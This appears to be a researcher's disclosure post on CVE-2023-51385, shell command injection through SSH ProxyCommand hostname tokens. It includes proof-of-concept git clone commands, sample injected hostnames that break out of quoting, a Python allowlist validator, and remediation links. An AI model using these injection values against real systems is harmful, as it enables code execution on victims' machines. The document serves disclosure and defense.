SSH ProxyCommand == unexpected code execution (CVE-2023-51385)
==============================================================
Dec 20, 2023
Summary
-------
SSH's `ProxyCommand` is a widely used feature for proxying ssh connections: it lets the user specify a custom command that is run to connect to the server. Arguments to this directive may contain tokens such as `%h` and `%u`, which expand to the hostname and username respectively.
When the hostname comes from an untrusted source, it can be malicious and look something like **\`malicious-command\`** (the backticks would cause a command to be executed by the shell).
[More info in docs which describe this feature in detail](https://man.openbsd.org/ssh_config#ProxyCommand)
Let’s review an example
-----------------------
Taking an example based on the [docs](https://man.openbsd.org/ssh_config#ProxyCommand):

```
Host *.example.com
ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p
```

In this case there is no sanitization of the hostname: `%h` is substituted verbatim into the command line, so a malicious hostname may allow command execution.
Can I haz PoC?
--------------
What good is all this without a PoC? So here we go! Once you have added the above example to your `.ssh/config`, try the following, which should pop a calculator on OS X:

```
git clone https://github.com/vin01/poc-proxycommand-vulnerable --recurse-submodules
```

Even if the ProxyCommand wraps the argument in single quotes to sanitize it, i.e. `'%h'`, that is not sufficient: an attacker-controlled hostname might itself contain a single quote and defeat the quoting.

PoC 2:

```
git clone https://github.com/vin01/poc-proxycommand-vulnerable-v2 --recurse-submodules
```
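The following is an added example, not code from the original post or from OpenSSH: it models the unescaped `%h`/`%p`/`%u` substitution that makes the two PoCs above work, and shows a conservative DNS-style hostname allowlist that a wrapper (git, a tooling script, a deployment tool) can apply before an untrusted name ever reaches ssh. The regex, the helper names and the sample hostnames are this example's own assumptions.

```python
import re

# Conservative hostname allowlist in the style of RFC 1123 labels: letters, digits
# and hyphens joined by dots. Written for this example; it is not OpenSSH's own check.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(rf"{_LABEL}(?:\.{_LABEL})*")


def is_safe_hostname(host: str) -> bool:
    """True only for a plain DNS-style name; anything a shell could interpret is rejected."""
    return 0 < len(host) <= 253 and _HOSTNAME_RE.fullmatch(host) is not None


def expand_proxy_command(template: str, host: str, port: int, user: str = "git") -> str:
    """Expand %h, %p, %u and %% the way ssh_config does: plain substitution, no escaping.

    The result is the string ssh hands to the user's shell, which is why the
    hostname must be trusted or validated *before* it gets here.
    """
    out, i = [], 0
    while i < len(template):
        if template[i] == "%" and i + 1 < len(template):
            tok = template[i + 1]
            out.append({"h": host, "p": str(port), "u": user, "%": "%"}.get(tok, "%" + tok))
            i += 2
        else:
            out.append(template[i])
            i += 1
    return "".join(out)


def build_proxy_command(template: str, host: str, port: int) -> str:
    """Validate an untrusted hostname, then expand. Raises ValueError on a bad name."""
    if not is_safe_hostname(host):
        raise ValueError(f"refusing to expand ProxyCommand for hostname {host!r}")
    return expand_proxy_command(template, host, port)


if __name__ == "__main__":
    nc = "/usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p"
    quoted = "/usr/bin/nc -X connect -x 192.0.2.0:8080 '%h' %p"
    # Constructed hostnames: one with backticks (PoC 1), one that breaks out of '%h' (PoC 2).
    for bad in ("`id`", "a'; id; '"):
        print("shell would see :", expand_proxy_command(quoted, bad, 22))
        print("allowlist accepts:", is_safe_hostname(bad))
    print(build_proxy_command(nc, "git.example.com", 22))
```

Running it prints the exact command line the shell would receive for each constructed hostname, and shows that the single-quoted template still yields a broken-out command for the second one while the allowlist rejects both.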
Remediation
-----------
Update to:
* [OpenSSH 9.6p1](https://www.openssh.com/txt/release-9.6)
* [libssh 0.10.6 and 0.9.8](https://www.libssh.org/security/advisories/CVE-2023-6004.txt)
Vulnerable usage out in the wild
--------------------------------
* [https://help.okta.com/asa/en-us/content/topics/adv\_server\_access/docs/custom-ssh-client.htm](https://help.okta.com/asa/en-us/content/topics/adv_server_access/docs/custom-ssh-client.htm)
* [https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/use-cases/ssh/](https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/use-cases/ssh/)
* [https://cloud.google.com/iap/docs/tcp-by-host](https://cloud.google.com/iap/docs/tcp-by-host)
* [https://docs.aws.amazon.com/systems-manager/latest/userguide/session-manager-getting-started-enable-ssh-connections.html](https://docs.aws.amazon.com/systems-manager/latest/userguide/session-manager-getting-started-enable-ssh-connections.html)
* [https://goteleport.com/docs/connect-your-client/tsh/](https://goteleport.com/docs/connect-your-client/tsh/)
* [https://en.wikibooks.org/wiki/OpenSSH/Cookbook/Proxies\_and\_Jump\_Hosts#Tunneling\_the\_SSH\_Client\_Over\_Tor\_with\_Netcat](https://en.wikibooks.org/wiki/OpenSSH/Cookbook/Proxies_and_Jump_Hosts#Tunneling_the_SSH_Client_Over_Tor_with_Netcat)
CVEs and references
-------------------
* [CVE-2023-51385](https://nvd.nist.gov/vuln/detail/CVE-2023-51385)
* [CVE-2023-6004](https://access.redhat.com/security/cve/cve-2023-6004)
My sincere thanks to:
---------------------
* Kevin Roh @ Okta for brilliant triaging and impact assessment
* Jakub Jelen @ libssh for timely follow up and communication
* Damien Miller and others @ OpenSSH for patches and discussions
* Maintainers @ Git for discussions to define a potential trust boundary between ssh and git
**[How to donate to OpenSSH/OpenBSD](https://www.openbsd.org/donations.html)**